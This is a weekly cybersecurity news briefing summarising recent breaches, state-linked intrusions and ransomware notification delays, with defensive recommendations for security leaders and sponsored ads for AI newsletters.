In partnership with
👋 Welcome to The CyberSignal Weekly Briefing.
This week, the adversary didn't need a zero-day. They needed patience. A China-linked group sat dormant inside 12 critical networks for eight months before deploying its payload. A ransomware gang breached a healthcare center in May 2025 and watched the clock run for a full year before patients were notified. ShinyHunters didn't touch Amtrak directly — they went through Salesforce and pivoted in. The theme connecting every major story this week is the same one defenders keep underestimating: dwell time, trust abuse, and the gap between what policy says and what production enforces. That gap is where the real damage accumulates.
There's a lot to cover. Let's get into it.
📣 Announcement
The CyberSignal Daily is live.
We've launched a free daily briefing — five top stories, key numbers, and an editorial signal, every morning in under 5 minutes. Same voice, same focus, every day.
🔎 Overview: What Shifted in Cyber Since Last Week
Shadow-Earth-053 disclosed — China's newest APT lurked in 12+ NATO-aligned networks for 8 months undetected
Handala doxxed 2,379 US Marines — sent WhatsApp missile threats to active-duty service members, attributed to Iran's MOIS
ShinyHunters claimed 9.4M Amtrak records — via Salesforce; 2.1M confirmed on Have I Been Pwned
Sandhills Medical notified 169,017 patients — nearly a year after Inc Ransom published their data publicly
FBI Operation Winter SHIELD wrapped — 10 controls every organization should already be enforcing
BlueNoroff deepfaked Zoom video — planted a 66-day fileless implant in a Web3 firm
Medtronic confirmed ShinyHunters breach — 9M records, same Salesforce chain as Amtrak and ADT
APT28 patch left a zero-click hole open — researchers found the fix was incomplete within days
North Korea planted npm malware via fake US companies — using AI-generated personas and front firms
Kettering Health: 1.7M patients exposed — Interlock ransomware spent 41 days inside undetected
✨ Our Partner
Go from AI overwhelmed to AI savvy professional
AI will eliminate 300 million jobs in the next 5 years.
Yours doesn't have to be one of them.
Here's how to future-proof your career:
Join the Superhuman AI newsletter - read by 1M+ professionals
Learn AI skills in 3 mins a day
Become the AI expert on your team
🔥 Top Stories
01 — Shadow-Earth-053: China's Newest Spy Group Found Lurking in Critical Networks
Nation-State Cyber Threats
A previously undocumented China-linked group infiltrated 12+ critical networks across Poland and Asia — sitting dormant for up to eight months before activating ShadowPad. Researchers at TrendAI describe it as "the younger brother and sister of the Typhoon campaigns." Targets: defense contractors, government agencies, and transportation firms in NATO-aligned nations. Poland's presence on the victim list is significant — it is a NATO frontline anchor and the primary logistics hub for Western military aid to Ukraine.
Why it matters: Eight months of dormancy is not a failure — it is the operation. Shadow-Earth-053 is pre-positioning, not collecting. The question isn't whether you've been breached. It's whether you'd know.
02 — Iran-Linked Handala Leaks 2,379 US Marines' Data and Sends WhatsApp Missile Threats
Nation-State Cyber Threats
Handala published names and phone numbers of 2,379 US Marines in the Persian Gulf and sent direct WhatsApp messages warning of targeting by Shahed drones and Kheibar missiles. The DOJ attributes the operation to Iran's MOIS. The data may have come from data brokers, not a military breach — but the messages were real, received by real service members, with real psychological impact.
Why it matters: The goal was never the data. It was the feeling of being surveilled. That works whether the intelligence is real or not.
03 — ShinyHunters Claims 9.4M Amtrak Records via Salesforce
Data Breaches
ShinyHunters claimed 9.4 million Amtrak records via the same Salesforce social engineering playbook used against ADT, Udemy, Medtronic, Vimeo, and Cisco this year. A dataset of 2.1 million unique accounts is confirmed on Have I Been Pwned. Amtrak has not commented. The most dangerous element isn't the email addresses — it's the customer support interaction records, which reveal travel patterns and routes, enabling hyper-targeted follow-on phishing.
Why it matters: ShinyHunters operationalized Salesforce as a master key. They're not breaching companies — they breached the shared vendor and are pivoting to dozens of clients at once. More disclosures are coming.
04 — Inc Ransom Breach at Sandhills Medical: 169,017 Patients Notified 12 Months Later
Ransomware
Inc Ransom breached Sandhills Medical Foundation in May 2025 and published the stolen data publicly in June 2025. Patient notifications went out April 28, 2026 — nearly a year after discovery and ten months after the data was freely downloadable. SSNs, TINs, passports, medical records, and financial information for 169,017 rural South Carolina patients were exposed. HIPAA requires notification within 60 days. They took 300.
Why it matters: This isn't delayed disclosure — it's the patient bearing all the risk alone. Expect HHS OCR action.
05 — FBI Operation Winter SHIELD: 10 Controls Every Organization Should Already Have
Policy & Government
The FBI's nine-week Operation Winter SHIELD campaign wrapped this week — connecting each of its ten defensive priorities to a real bureau investigation. The message is blunt: most breaches happen not because organizations chose the wrong tool, but because they don't enforce what they already know works. Microsoft publicly backed the initiative. Top priorities: third-party risk management and phish-resistant MFA — the two controls the FBI keeps watching fail in production.
Why it matters: Run the checklist against production, not policy documents. For each control, ask: enforced or just documented? The answer will be uncomfortable.
06 — BlueNoroff Used AI Deepfake Zoom Video to Plant a 66-Day Fileless Implant
Nation-State Cyber Threats
North Korea's BlueNoroff used AI-generated deepfake video on a live Zoom call to trick a Web3 firm employee into running a fileless PowerShell payload. The implant operated undetected for 66 days. Nothing ever touched disk. The operation targeted crypto holdings and marks DPRK's first confirmed use of real-time deepfake video impersonation — beyond fake LinkedIn profiles into live calls.
Why it matters: If the attacker looks and sounds like your colleague on Zoom, phishing training doesn't help. Detection has to move to behavioral anomaly.
07 — Massachusetts Fines Fidelity $1.25M for IDOR Breach Exposing 77,000 Customers
Policy & Government
A sequential document ID visible in Fidelity's browser URL let any logged-in customer access any other customer's records — SSNs, credit card numbers, medical information, passports — for three days in August 2024. ~77,000 customers affected. Fidelity also failed to notify many of them, including minor children of affected account holders. Massachusetts filed a $1.25M consent order on April 27.
Why it matters: IDOR in financial systems is entirely preventable. "Failure to enforce its own cybersecurity protocols" — that's the whole story. State regulators are filling the enforcement vacuum federal agencies are leaving.
📈 Data & Research Corner
Metric | Figure |
|---|---|
Amtrak accounts confirmed on Have I Been Pwned | 2.1 million |
ShinyHunters claimed Amtrak records | 9.4 million |
Sandhills Medical patients affected | 169,017 |
Days Inc Ransom data was public before notification | ~300 days |
Shadow-Earth-053 confirmed network intrusions | 12+ |
US Marines doxxed by Handala | 2,379 |
Medtronic records claimed by ShinyHunters | 9 million |
Roblox accounts hijacked via session cookie theft | 610,000 |
FBI Operation Winter SHIELD duration | 9 weeks |
BlueNoroff implant dwell time undetected | 66 days |
🔧 Tool Spotlight
Want to get the most out of ChatGPT?
ChatGPT is a superpower if you know how to use it correctly.
Discover how HubSpot's guide to AI can elevate both your productivity and creativity to get more things done.
Learn to automate tasks, enhance decision-making, and foster innovation with the power of AI.
🔍 Also On Our Radar
Medtronic confirms ShinyHunters breach — 9M records — Medtronic confirmed a data breach after ShinyHunters claimed 9 million records via the same Salesforce social engineering chain used against Amtrak and ADT. One of the world's largest medical device manufacturers now has a confirmed entry in ShinyHunters' industrialized breach pipeline.
Kettering Health ransomware — 1.7M patients, 41 days undetected — Interlock ransomware spent 41 days inside Kettering Health's network before detection. 1.7 million patients affected across Ohio hospital systems. The dwell time allowed full network mapping before encryption began.
APT28 zero-day patched — but the patch left a zero-click hole open — Microsoft patched a Windows privilege escalation vulnerability exploited by APT28. Researchers found the fix was incomplete within days, leaving a zero-click attack surface open. CISA added both to KEV.
North Korea planted npm malware via fake US companies and AI personas — DPRK operatives registered fake US-incorporated companies, created AI-generated front employees, and used them to push malicious npm packages targeting developer credentials and crypto wallets.
Silk Typhoon-linked hacker extradited to the US over COVID-19 research theft — Xu Zewei, linked to China's Silk Typhoon APT, was extradited from Italy and charged with stealing COVID-19 research and exploiting Microsoft Exchange vulnerabilities against US agencies.
Germany formally blamed Russia for Signal phishing attacks on Bundestag MPs — APT28 is running a targeted Signal phishing campaign against members of the German parliament. Germany issued a formal attribution statement — the second Russian cyber attribution action by a NATO member this month.
🛡️ Actionable Playbook for CISOs & IT Leaders
Audit your Salesforce vendor access immediately. ShinyHunters has confirmed breaches at ADT, Udemy, Medtronic, Vimeo, and Amtrak via the same Salesforce social engineering chain in 2026. Review all third-party integration permissions and session token exposure this week.
Deploy FIDO2 hardware keys for privileged accounts. The FBI's top Operation Winter SHIELD priority exists because SMS OTP, push notifications, and TOTP are all routinely bypassed by criminal toolkits. Hardware keys eliminate the entire attack category.
Hunt for ShadowPad and NoodleRat indicators now. If you are a government agency, defense contractor, or transportation firm in a NATO-aligned country, Shadow-Earth-053's TTPs are public. Run the indicators against your environment before concluding you are clean.
Check haveibeenpwned.com for Amtrak exposure. If you have ever had an Amtrak account or booked Amtrak travel, verify your email in the confirmed HIBP dataset. Support interaction records in this breach enable highly targeted follow-on phishing.
Lock down social media for personnel with deployment history. Handala's operation against US Marines is a template, not a one-off. Service members and government employees with Middle East or high-profile assignment history should remove location data, unit identifiers, and deployment references from all public profiles immediately.
⚡ The Signal
There is a number worth sitting with from this week: 300.
That is roughly how many days the stolen Sandhills Medical patient data — Social Security numbers, passports, medical records, financial information for 169,017 rural South Carolina patients — was freely downloadable on the dark web before those patients received an official notification. HIPAA says 60 days. The patients got 300 days of unmitigated exposure first.
That number is not unusual. It is representative. The Kettering Health intrusion ran 41 days before detection. Shadow-Earth-053 sat in critical networks for eight months. BlueNoroff's fileless implant operated for 66 days. These are not outliers. The dwell time numbers we see week after week describe an industry where detection lags intrusion by months, notification lags discovery by more months, and remediation lags notification by more time still. The compounding of those gaps is where real harm accumulates.
The FBI understands this, which is why Operation Winter SHIELD is not a new framework or a novel technical control — it is a nine-week campaign built around a single uncomfortable observation: the controls that would have prevented most of the breaches the FBI investigated already existed in the victim organizations. They were documented. They were in policy. They were not enforced in production.
ShinyHunters is on track to breach more organizations this year than most security operations centers will detect intrusions. The group has confirmed victims at ADT, Udemy, Medtronic, Vimeo, Cisco, Hallmark, Rockstar Games, and now Amtrak — all via the same Salesforce social engineering chain, all in 2026. No new technique. No zero-day. Just the same playbook, run repeatedly against organizations that have not closed the third-party access gap.
The question worth asking before next week's briefing: if an attacker compromised a trusted vendor with access to your environment today, how long would it be before you knew?
🔭 What to Watch Next Week
HHS OCR and the Sandhills Medical notification delay. A 300-day gap between breach discovery and patient notification on a publicly accessible dataset is a textbook civil money penalty trigger. Watch for enforcement action within 90 days.
Amtrak's official breach disclosure. With 2.1 million accounts confirmed on Have I Been Pwned and no public statement, the federal notification clock is running.
ShinyHunters' next Salesforce target. The group has breached eight or more named organizations via the same vector this year with no slowdown. More disclosures are coming — watch for Salesforce to issue a formal advisory.
Shadow-Earth-053 secondary attribution. TrendAI disclosed the group this week. Expect Mandiant, CrowdStrike, and Microsoft to publish overlapping attribution research within 2-3 weeks.
💡 Pro Tip of the Week
Before you send your next Amtrak booking confirmation to a colleague or post about travel plans — check haveibeenpwned.com and change your Amtrak password now. ShinyHunters' data includes customer support interaction records, which means the follow-on phishing that targets you will sound like it knows exactly where you've been.
Until next time,
Stay sharp. Stay ahead.
The CyberSignal Team
📩 Share this briefing with a colleague who needs to stay ahead.
📰 Full coverage at thecybersignal.com
☀️ Daily briefing at daily.thecybersignal.com
